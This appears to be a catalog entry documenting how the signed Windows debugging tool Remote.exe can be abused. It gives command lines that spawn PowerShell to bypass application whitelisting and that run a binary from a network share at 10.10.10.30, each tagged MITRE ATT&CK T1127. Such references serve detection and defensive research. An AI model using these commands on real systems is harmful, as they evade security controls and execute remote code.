.. /Remote.exe
Debugging tool included with Windows Debugging Tools
Paths:
- C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe
- C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe
Resources:
AWL bypass
Spawns powershell as a child process of remote.exe
Remote.exe /s "powershell.exe" anythinghere
Usecase: Executes a process under a trusted Microsoft signed binary
Privileges required: User
OS: Windows
MITRE ATT&CK®: T1127
Execute
Spawns powershell as a child process of remote.exe
Remote.exe /s "powershell.exe" anythinghere
Usecase: Executes a process under a trusted Microsoft signed binary
Privileges required: User
OS: Windows
MITRE ATT&CK®: T1127
Run a remote file
Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere
Usecase: Executing a remote binary without saving file to disk
Privileges required: User
OS: Windows
MITRE ATT&CK®: T1127